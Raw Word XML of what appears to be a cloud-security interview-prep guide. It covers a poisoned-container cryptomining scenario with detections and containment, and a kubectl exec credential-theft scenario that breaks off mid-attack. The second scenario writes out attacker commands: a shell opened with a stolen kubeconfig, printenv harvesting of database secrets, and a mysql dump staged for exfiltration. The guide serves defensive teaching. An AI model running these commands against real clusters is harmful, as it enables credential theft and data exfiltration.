                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E6B3C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SCENARIO 3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">Cryptomining via Compromised Container Image (Supply Chain)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="4A4A4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Poisoned Docker Hub image → XMRig cryptominer → resource hijack → persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Technique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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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T1195.002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Compromise Software Supply Chain</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Initial Access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Attacker poisons a popular python:3.9-slim image on Docker Hub by modifying libssl.so to embed XMRig miner loader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T1496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Resource Hijacking</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Impact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XMRig runs as a thread inside the Python process consuming 40% CPU to avoid threshold-based alerting</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T1071.001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Application Layer Protocol (Mining Pool)</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C2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Miner connects to pool.supportxmr[.]com over port 443, disguising mining pool traffic as HTTPS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T1036.005</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Masquerading: Match Legitimate Name</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Defense Evasion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Mining process masquerades as python3 — no separate binary; miner runs as a thread inside the legitimate interpreter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T1543</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Create or Modify System Process</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Persistence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Modified libssl.so loaded at every Python process start, ensuring miner restarts on pod restart automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack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1B2A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Developer pulls python:3.9-slim without digest pinning (floating tag)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Upstream image modified on Docker Hub: libssl.so replaced with mining loader</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Pod deployed to inventory-processor namespace</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ At Python import time: libssl.so loaded → mining thread spawned inside python3 process</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Connection to pool.supportxmr.com:443 (HTTPS, bypasses port-based blocks)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ 6 days pass: detected only via AWS EC2 cost anomaly (340% spike)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Falcon process behavior analysis → library load detection → C2 IP match</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Detections with Full Telemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Anomalous Library Load — SHA256 Mismatch</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libssl.so loaded from /usr/local/lib/ instead of expected /lib/x86_64-linux-gnu/. SHA256 of loaded library does not match the official python:3.9-slim image manifest. Falcon drift engine flags the library load as a non-image-layer file.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SuspiciousLibraryLoad | SHA256 mismatch vs image manifest | ContainerDrift.ModifiedSystemLibrary</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CloudTrail for library loads. ECR pull logs show image pulled without digest — floating tag used.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Malware:Runtime/MaliciousFile if library hash is in GuardDuty threat intelligence.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KAC: Image Assessment should have flagged this — was the ECR scan result PASS or FAIL? Check KAC admission logs for the pod.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Library loads from non-standard paths are suspicious. Legitimate Python never loads libssl from /usr/local/lib. The SHA256 mismatch against the image manifest is near-zero false positive. Only exception: explicitly mounted custom SSL libraries for compliance — which would be documented and expected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Process Connecting to Known Mining Pool</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python3 process making persistent TCP connection to pool.supportxmr.com on port 443. Connection is NOT one-shot (like an API call) but sustained with 10-second keepalive intervals. Falcon network intelligence identifies the destination as a known XMR mining pool IP range.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CryptominingActivity.XMRig | BeaconLikeTraffic.MiningPool | NetworkIntelligence: Known mining pool</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VPC Flow Logs: Sustained ALLOW record to mining pool IP. High byte count sustained over days.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CryptoCurrency:Runtime/BitcoinTool.B or UnauthorizedAccess:EC2/MetadataDNSRebind.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K8s audit. Check NetworkPolicy: should deny-all egress have blocked this? Another CSPM finding.</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Python web apps never make persistent TCP connections to external IPs except established API integrations. Mining pool IPs are in Falcon threat intel. Sustained connection with 10-second intervals matches the XMRig keepalive pattern — not a legitimate API call pattern.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU Throttling Pattern — Intentional Underutilization</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python3 process maintains sustained 38-42% CPU utilization. This is anomalous because: (1) web services have variable CPU (spiky, not sustained), (2) the exact 40% is below common HPA and alerting thresholds, suggesting intentional throttling by the miner to avoid detection. Falcon behavioral baseline fires on the sustained deviation.</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AnomalousCPUPattern.Container | SustainedHighCPU.NonBurst</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Indirectly: EC2 metrics in CloudWatch show sustained CPU across all instances in the node group — cost anomaly at billing level.</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direct GuardDuty finding for CPU patterns. Correlate with other detections.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kubectl top pods shows the affected pod consistently at CPU limit. Unusual vs historical baseline if metrics server has history.</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Machine learning models for training or data processing legitimately run at sustained high CPU. Distinguish: (1) Is this a processing workload or a web API? (2) Is the sustained CPU correlated with a mining pool network connection? (3) Did CPU spike after a specific image pull date? All three together confirm cryptomining.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A0522D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Image Floating Tag — CSPM Supply Chain Finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="A0522D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  [CSPM]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Deployment spec uses python:3.9-slim without a SHA256 digest. This means every pod restart or new node scale-out could pull a different (potentially malicious) image version. CSPM identifies this as a CIS K8s 5.3.1 violation across all deployments in the cluster.</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CSPM-K8S-IMAGE-001: Container image uses floating tag without digest pinning | Severity: HIGH</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ECR pull logs (if mirrored): show repeated pulls of same tag returning different digests over time — confirms upstream image was mutated.</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direct finding. Correlate with Malware:Runtime findings on pods using affected images.</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Admission webhook logs: KAC should block images without approved digest. If KAC not enforcing digests — this is a policy gap.</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Most deployments use floating tags in development (legitimate). CSPM flags ALL floating tags — filter false positives by namespace: development namespace findings are MEDIUM, production namespace is HIGH/CRITICAL requiring immediate remediation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C9E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Modified Base Image Layer — Falcon Image Assessment</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When the affected image is submitted to Falcon Image Assessment (either via CI/CD pipeline scan or ECR push webhook), the assessment detects: (1) executable section in libssl.so (SSL libraries should not have executable stubs), (2) network callback in library initialization code, (3) SHA256 mismatch vs Docker Hub official manifest.</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ImageAssessment.MaliciousLibrary | ImageAssessment.UnexpectedExecutableInLibrary | KAC DENY if enforced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ECR PutImage event when poisoned image was pushed. Check timestamp and user/role that pushed.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ECR:MaliciousIPCaller if the push came from a known malicious IP (unlikely — attacker compromised Docker Hub, not ECR).</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KAC admission: AdmissionWebhook DENY — ImageAssessmentPolicy:Failed if assessment is enforced. If ALLOW — image ran despite failed assessment (policy not enforced).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Image assessment findings are almost always true positives for executable sections in library files. The only false positive scenario is a custom-built library for a specific use case — which would be documented in the approved exception list. Untrusted public registry images should never bypass assessment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Containment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DEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Immediate Response Steps:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1) Immediately delete all pods using the affected image. 2) Block the Docker Hub image tag in KAC image policy (require internal ECR mirror). 3) Enforce digest pinning on all deployments via OPA/KAC. 4) Enable image signing verification (cosign). 5) Set up ECR pull-through cache with automatic scanning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interview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9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E6B3C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">How to explain this scenario in the interview:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">"The cryptominer hid inside a legitimate Python process — there was no separate malicious binary for AV to find. Traditional scanning missed it because it only looks at the image layers, not the runtime behavior. Falcon caught it by watching what the python3 process was doing on the network. The prevention is digest pinning — if the image hash changes between pulls, deployment fails. One line of policy prevents this entire attack class."</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EF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A0522D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">SCENARIO 4</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">kubectl exec Abuse for Credential Harvesting &amp; Database Exfiltration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="4A4A4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stolen kubeconfig → exec into prod pod → DB credential harvest → data exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Technique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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="396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T1078.001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Valid Accounts: Default Accounts</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Initial Access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Attacker uses a kubeconfig file leaked in a public GitHub repository containing a service account token with exec permissions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T1059.004</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Unix Shell</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Execution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kubectl exec spawns interactive bash shell inside the production payments pod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T1552.001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Credentials in Files (Env Vars)</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Credential Access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Attacker runs printenv inside the pod and harvests database credentials stored as environment variables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T1005</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Data from Local System</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Collection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Using harvested DB credentials, attacker queries and extracts 500,000 customer records from RDS via the pod's network path</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T1041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Exfiltration Over C2 Channel</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Exfiltration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Data exfiltrated via HTTPS POST requests from within the pod to attacker-controlled S3-like endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack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1B2A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub secret scanner MISSES kubeconfig in private repo (later made public accidentally)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Attacker downloads kubeconfig containing SA token for payments namespace</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ kubectl --kubeconfig stolen.conf exec -it payments-api-7d4f -n payments -- /bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Interactive shell inside production pod</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ printenv | grep -Ei "DB_|DATABASE_|POSTGRES_|MYSQL_|REDIS_"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ Finds: DB_PASSWORD=Pr0duct10nP@ss, DB_HOST=prod-rds.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ mysql -h prod-rds.internal -u payments_user -pPr0duct10nP@ss</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">→ SELECT * FROM customer_payments LIMIT 500000 INTO OUTFILE '/tmp/exfil.csv'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E8F4FD"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
